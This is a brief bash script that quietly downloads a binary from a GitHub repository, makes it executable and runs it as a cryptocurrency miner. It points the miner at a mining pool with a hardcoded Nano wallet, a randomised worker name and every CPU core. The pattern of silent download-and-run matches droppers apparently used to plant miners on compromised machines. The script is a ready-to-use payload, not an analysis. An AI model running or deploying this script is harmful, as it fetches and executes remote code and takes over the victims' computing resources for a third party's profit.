#!/bin/bash
wget -O mmm https://github.com/kidoescegh/xm/raw/main/newxm > /dev/null 2>&1
chmod 777 mmm
./mmm --donate-level 1 -o xmrig.nanswap.com:3333 -u nano_176wjrt4wkg6kj31e7akakqtpr14fjbtwok6cz4to5i5rqnsk7x9zrrmt7pm -p $(echo $(shuf -i 1-100000 -n 1)-mamah) -a rx/0 -t $(nproc --all) 
